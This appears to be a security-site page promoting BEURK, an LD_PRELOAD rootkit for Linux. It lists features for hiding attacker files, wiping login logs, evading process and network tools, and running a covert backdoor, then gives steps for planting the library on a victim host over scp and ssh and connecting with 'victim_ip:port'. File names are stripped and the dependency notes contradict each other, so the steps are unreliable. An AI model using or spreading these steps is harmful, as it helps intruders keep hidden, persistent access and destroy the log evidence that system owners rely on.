BEURK - Experimental Unix RootKit




BEURK is an userland preload rootkit for GNU/Linux, heavily focused around anti-debugging and anti-detection features, according to


  • Hide attacker files and directories
  • Realtime log cleanup (on utmp/wtmp)
  • Anti process and login detection
  • Bypass unhide, lsof, ps, ldd, netstat analysis
  • Furtive PTY backdoor client

Upcoming features

  • ptrace(2) hooking for anti-debugging
  • libpcap hooking undermines local sniffers
  • PAM backdoor for local privilege escalation


  • Compile

git clone

cd beurk


  • Install

scp [email protected]:/lib/

ssh [email protected] 'echo /lib/ >> /etc/'

  • Done!

./ victim_ip:port # connect with furtive backdoor


The following packages are not required in order to build BEURK at the moment:

  • libpcap – to avoid local sniffing
  • libpam – for local PAM backdoor
  • libssl – for encrypted backdoor connection

Example on Debian:

apt-get install libpcap-dev libpam-dev libssl-dev

Installing BEURK

su -

git clone [email protected]:unix-thrust/beurk.git

cd beurk

./build beurk.conf

mv /lib

echo "/lib/" > /etc/

Would you like to comment on this article?


Latest articles


77% of companies hit by cyber-attacks in 2017

Kaspersky Lab IT Security Economics Report reveals that 77% of companies have been hit by some type of cyber-attack.


75% of applications have at least one vulnerability

Developers, however, are not the only ones to blame.


Guide for GDPR compliance

In May 2018, the General Data Privacy Regulation (GDPR) will take effect, significantly changing the way organizations process and store data.

Sign up for our online newsletter!